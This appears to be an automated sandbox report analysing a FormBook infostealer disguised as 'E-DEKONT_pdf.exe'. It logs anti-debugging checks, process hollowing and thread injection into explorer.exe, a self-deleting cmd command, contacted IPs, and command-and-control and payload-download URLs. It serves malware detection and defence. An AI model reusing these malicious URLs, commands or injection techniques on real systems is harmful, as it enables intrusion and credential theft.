Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C60A0 mov eax, dword ptr fs:[00000030h]	3_2_043C60A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043800A5 mov eax, dword ptr fs:[00000030h]	3_2_043800A5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433A093 mov ecx, dword ptr fs:[00000030h]	3_2_0433A093
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433C090 mov eax, dword ptr fs:[00000030h]	3_2_0433C090
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043C7090 mov eax, dword ptr fs:[00000030h]	3_2_043C7090
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D6090 mov eax, dword ptr fs:[00000030h]	3_2_043D6090
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04414080 mov eax, dword ptr fs:[00000030h]	3_2_04414080
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04414080 mov eax, dword ptr fs:[00000030h]	3_2_04414080
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04414080 mov eax, dword ptr fs:[00000030h]	3_2_04414080
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04414080 mov eax, dword ptr fs:[00000030h]	3_2_04414080
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04414080 mov eax, dword ptr fs:[00000030h]	3_2_04414080
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04414080 mov eax, dword ptr fs:[00000030h]	3_2_04414080
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04414080 mov eax, dword ptr fs:[00000030h]	3_2_04414080
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433C0F6 mov eax, dword ptr fs:[00000030h]	3_2_0433C0F6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437D0F0 mov eax, dword ptr fs:[00000030h]	3_2_0437D0F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437D0F0 mov ecx, dword ptr fs:[00000030h]	3_2_0437D0F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043390F8 mov eax, dword ptr fs:[00000030h]	3_2_043390F8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043390F8 mov eax, dword ptr fs:[00000030h]	3_2_043390F8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043390F8 mov eax, dword ptr fs:[00000030h]	3_2_043390F8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043390F8 mov eax, dword ptr fs:[00000030h]	3_2_043390F8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CC0E0 mov ecx, dword ptr fs:[00000030h]	3_2_043CC0E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0435B0D0 mov eax, dword ptr fs:[00000030h]	3_2_0435B0D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433B0D6 mov eax, dword ptr fs:[00000030h]	3_2_0433B0D6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433B0D6 mov eax, dword ptr fs:[00000030h]	3_2_0433B0D6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433B0D6 mov eax, dword ptr fs:[00000030h]	3_2_0433B0D6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433B0D6 mov eax, dword ptr fs:[00000030h]	3_2_0433B0D6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_044150B7 mov eax, dword ptr fs:[00000030h]	3_2_044150B7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043FF13E mov eax, dword ptr fs:[00000030h]	3_2_043FF13E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04415149 mov eax, dword ptr fs:[00000030h]	3_2_04415149
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043CA130 mov eax, dword ptr fs:[00000030h]	3_2_043CA130
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04413157 mov eax, dword ptr fs:[00000030h]	3_2_04413157
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04413157 mov eax, dword ptr fs:[00000030h]	3_2_04413157
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04413157 mov eax, dword ptr fs:[00000030h]	3_2_04413157
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04377128 mov eax, dword ptr fs:[00000030h]	3_2_04377128
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04377128 mov eax, dword ptr fs:[00000030h]	3_2_04377128
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433F113 mov eax, dword ptr fs:[00000030h]	3_2_0433F113
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04370118 mov eax, dword ptr fs:[00000030h]	3_2_04370118
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436510F mov eax, dword ptr fs:[00000030h]	3_2_0436510F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436510F mov eax, dword ptr fs:[00000030h]	3_2_0436510F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436510F mov eax, dword ptr fs:[00000030h]	3_2_0436510F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436510F mov eax, dword ptr fs:[00000030h]	3_2_0436510F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436510F mov eax, dword ptr fs:[00000030h]	3_2_0436510F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436510F mov eax, dword ptr fs:[00000030h]	3_2_0436510F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436510F mov eax, dword ptr fs:[00000030h]	3_2_0436510F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436510F mov eax, dword ptr fs:[00000030h]	3_2_0436510F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436510F mov eax, dword ptr fs:[00000030h]	3_2_0436510F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436510F mov eax, dword ptr fs:[00000030h]	3_2_0436510F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436510F mov eax, dword ptr fs:[00000030h]	3_2_0436510F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436510F mov eax, dword ptr fs:[00000030h]	3_2_0436510F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436510F mov eax, dword ptr fs:[00000030h]	3_2_0436510F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434510D mov eax, dword ptr fs:[00000030h]	3_2_0434510D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0439717A mov eax, dword ptr fs:[00000030h]	3_2_0439717A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0439717A mov eax, dword ptr fs:[00000030h]	3_2_0439717A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04346179 mov eax, dword ptr fs:[00000030h]	3_2_04346179
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437716D mov eax, dword ptr fs:[00000030h]	3_2_0437716D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437415F mov eax, dword ptr fs:[00000030h]	3_2_0437415F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433A147 mov eax, dword ptr fs:[00000030h]	3_2_0433A147
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433A147 mov eax, dword ptr fs:[00000030h]	3_2_0433A147
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0433A147 mov eax, dword ptr fs:[00000030h]	3_2_0433A147
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D314A mov eax, dword ptr fs:[00000030h]	3_2_043D314A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D314A mov eax, dword ptr fs:[00000030h]	3_2_043D314A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D314A mov eax, dword ptr fs:[00000030h]	3_2_043D314A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043D314A mov eax, dword ptr fs:[00000030h]	3_2_043D314A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043731BE mov eax, dword ptr fs:[00000030h]	3_2_043731BE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043731BE mov eax, dword ptr fs:[00000030h]	3_2_043731BE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043741BB mov ecx, dword ptr fs:[00000030h]	3_2_043741BB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043741BB mov eax, dword ptr fs:[00000030h]	3_2_043741BB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043741BB mov eax, dword ptr fs:[00000030h]	3_2_043741BB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437E1A4 mov eax, dword ptr fs:[00000030h]	3_2_0437E1A4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0437E1A4 mov eax, dword ptr fs:[00000030h]	3_2_0437E1A4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04369194 mov eax, dword ptr fs:[00000030h]	3_2_04369194
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04381190 mov eax, dword ptr fs:[00000030h]	3_2_04381190
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04381190 mov eax, dword ptr fs:[00000030h]	3_2_04381190
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_044081EE mov eax, dword ptr fs:[00000030h]	3_2_044081EE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_044081EE mov eax, dword ptr fs:[00000030h]	3_2_044081EE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04344180 mov eax, dword ptr fs:[00000030h]	3_2_04344180
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04344180 mov eax, dword ptr fs:[00000030h]	3_2_04344180
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04344180 mov eax, dword ptr fs:[00000030h]	3_2_04344180
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043391F0 mov eax, dword ptr fs:[00000030h]	3_2_043391F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043391F0 mov eax, dword ptr fs:[00000030h]	3_2_043391F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043501F1 mov eax, dword ptr fs:[00000030h]	3_2_043501F1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043501F1 mov eax, dword ptr fs:[00000030h]	3_2_043501F1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043501F1 mov eax, dword ptr fs:[00000030h]	3_2_043501F1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436F1F0 mov eax, dword ptr fs:[00000030h]	3_2_0436F1F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436F1F0 mov eax, dword ptr fs:[00000030h]	3_2_0436F1F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043491E5 mov eax, dword ptr fs:[00000030h]	3_2_043491E5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043491E5 mov eax, dword ptr fs:[00000030h]	3_2_043491E5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436B1E0 mov eax, dword ptr fs:[00000030h]	3_2_0436B1E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436B1E0 mov eax, dword ptr fs:[00000030h]	3_2_0436B1E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436B1E0 mov eax, dword ptr fs:[00000030h]	3_2_0436B1E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436B1E0 mov eax, dword ptr fs:[00000030h]	3_2_0436B1E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436B1E0 mov eax, dword ptr fs:[00000030h]	3_2_0436B1E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436B1E0 mov eax, dword ptr fs:[00000030h]	3_2_0436B1E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0436B1E0 mov eax, dword ptr fs:[00000030h]	3_2_0436B1E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434A1E3 mov eax, dword ptr fs:[00000030h]	3_2_0434A1E3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434A1E3 mov eax, dword ptr fs:[00000030h]	3_2_0434A1E3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434A1E3 mov eax, dword ptr fs:[00000030h]	3_2_0434A1E3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434A1E3 mov eax, dword ptr fs:[00000030h]	3_2_0434A1E3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0434A1E3 mov eax, dword ptr fs:[00000030h]	3_2_0434A1E3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043381EB mov eax, dword ptr fs:[00000030h]	3_2_043381EB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043501C0 mov eax, dword ptr fs:[00000030h]	3_2_043501C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043501C0 mov eax, dword ptr fs:[00000030h]	3_2_043501C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043551C0 mov eax, dword ptr fs:[00000030h]	3_2_043551C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043551C0 mov eax, dword ptr fs:[00000030h]	3_2_043551C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043551C0 mov eax, dword ptr fs:[00000030h]	3_2_043551C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_043551C0 mov eax, dword ptr fs:[00000030h]	3_2_043551C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_044151B6 mov eax, dword ptr fs:[00000030h]	3_2_044151B6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_04360230 mov ecx, dword ptr fs:[00000030h]	3_2_04360230
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440124C mov eax, dword ptr fs:[00000030h]	3_2_0440124C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 3_2_0440124C mov eax, dword ptr fs:[00000030h]	3_2_0440124C

Source: C:\Windows\SysWOW64\colorcpl.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe

Code function: 0_2_00405DC7 GetFileAttributesA,LdrInitializeThunk,LdrInitializeThunk,CreateFileA,

0_2_00405DC7

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.91 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 122.201.64.145 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 195.179.237.158 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.117.168.233 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.190.63.111 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 160.121.87.199 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 142.250.181.243 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 112.196.98.174 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 202.95.14.233 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.27.72.143 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.215 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe

Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 660000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	Thread register set: target process: 4836			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Thread register set: target process: 4836			Jump to behavior

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe	Process created: C:\Users\user\Desktop\E-DEKONT_pdf.exe C:\Users\user\Desktop\E-DEKONT_pdf.exe			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\E-DEKONT_pdf.exe"			Jump to behavior

Source: C:\Users\user\Desktop\E-DEKONT_pdf.exe

0_2_00403390

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.7559027765.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.7560803534.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.7559027765.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.7560803534.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 Windows Service	1 Access Token Manipulation	1 Rootkit	1 Credential API Hooking	121 Security Software Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Shared Modules	1 DLL Side-Loading	1 Windows Service	11 Masquerading	LSASS Memory	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	4 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	511 Process Injection	12 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 DLL Side-Loading	1 Access Token Manipulation	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	511 Process Injection	LSA Secrets	4 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	2 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Link
E-DEKONT_pdf.exe	22%	ReversingLabs
E-DEKONT_pdf.exe	23%	Virustotal	Browse
E-DEKONT_pdf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll	0%	ReversingLabs
C:\Users\user\procharity\Anasarca\Uncompelled\Velocity\aedilic\Subanconeal\MapiProxy_InUse.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.0.E-DEKONT_pdf.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491	Download File
0.2.E-DEKONT_pdf.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491	Download File
3.2.colorcpl.exe.272ebd0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.E-DEKONT_pdf.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491	Download File
3.2.colorcpl.exe.485f840.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.explorer.exe.128af840.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
td-ccm-168-233.wixdns.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.crosswalkconsulting.co.uk/mi94/?uZgtA=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz&G6GdR=axl0	0%	Avira URL Cloud	safe
http://www.edelman-production.com/mi94/?uZgtA=ORIqx8IF1+X+2hN52P87hXte5s/HoBMDp1q1F2AtNmI3dmVw+3KXXOfhBFQ6DTUSnU2z&G6GdR=axl0	0%	Avira URL Cloud	safe
http://www.peterslawonline.com/mi94/?uZgtA=sfgefL3EX7tLrVmbrrvt2gRLjrdY9EgZIzRUFJ3eu0i+5BdWwZEHyNY8KODjs8HGUQbA&G6GdR=axl0	0%	Avira URL Cloud	safe
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin	100%	Avira URL Cloud	malware
http://www.gopher.ftp://ftp.	0%	Avira URL Cloud	safe
http://www.licensescape.com/mi94/?uZgtA=DdTnYTdsvxFdVgqd/vVQw4Ms7Aw/OPz+4Pu9rQ+4bXN8JsUKt08leuavRNawr2d0j4jE&YtxdA=ClrLPvDXABoDT8	0%	Avira URL Cloud	safe
http://www.credit-cards-54889.com/mi94/?YtxdA=ClrLPvDXABoDT8&uZgtA=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m	0%	Avira URL Cloud	safe
http://www.anotherworldrecord.com/mi94/?uZgtA=yKcY3jotfSPLyB/ftSMp74iudURdb3SAsX12brKJ4aUNBvL8L7J7V3FDmQx4l6kHWp2H&G6GdR=axl0	100%	Avira URL Cloud	malware
http://www.bizformspro.com/mi94/?uZgtA=wd6Ye7WFDj3kGWmVOBmu3CHl8Eb+rC+I8gKa3GPCKACefvwcZ2db37gmqz26Fz2MH3/e&G6GdR=axl0	0%	Avira URL Cloud	safe
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	0%	Avira URL Cloud	safe
http://www.lapalmaaccesible.com/mi94/?uZgtA=4Tl7mkmR2hfQ9KBizErbd2os7QrtMSS1Xe9D2XLoGouUMWTPUZ0bimWLWeFNR5N6++45&G6GdR=axl0	0%	Avira URL Cloud	safe
http://www.anjin98.com/mi94/?uZgtA=utr1Sw3RyipqcYNbY+d8Z2Tb0M8wQrjWYhfSD+Y+PBLnRGhO3V2BTvKgLoZBbtabZvWX&G6GdR=axl0	0%	Avira URL Cloud	safe
http://www.couragetokingdom.com/mi94/?uZgtA=n+xM7LV5reGXDvbBpS71QDTdFlxot1/H++BJiUiW2QOMgqsfv+9mucFei6E+3dV5Q0+2&G6GdR=axl0	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	0%	Avira URL Cloud	safe
http://www.funtime28.online/mi94/?uZgtA=zH93CAcCrit8Ot+ZBqn/vyMyC45co0bQrrnuYMPQl4K63vhoNC/Ny1DoALksFDMvrnCN&G6GdR=axl0	0%	Avira URL Cloud	safe
http://www.emiu6696.com/mi94/?YtxdA=ClrLPvDXABoDT8&uZgtA=9d/LjZG6HsJ3NNhq1rA+PmL3FctD92E4WX5AE58IVInBpcqC/aiyhlqcUifd684qA43E	0%	Avira URL Cloud	safe
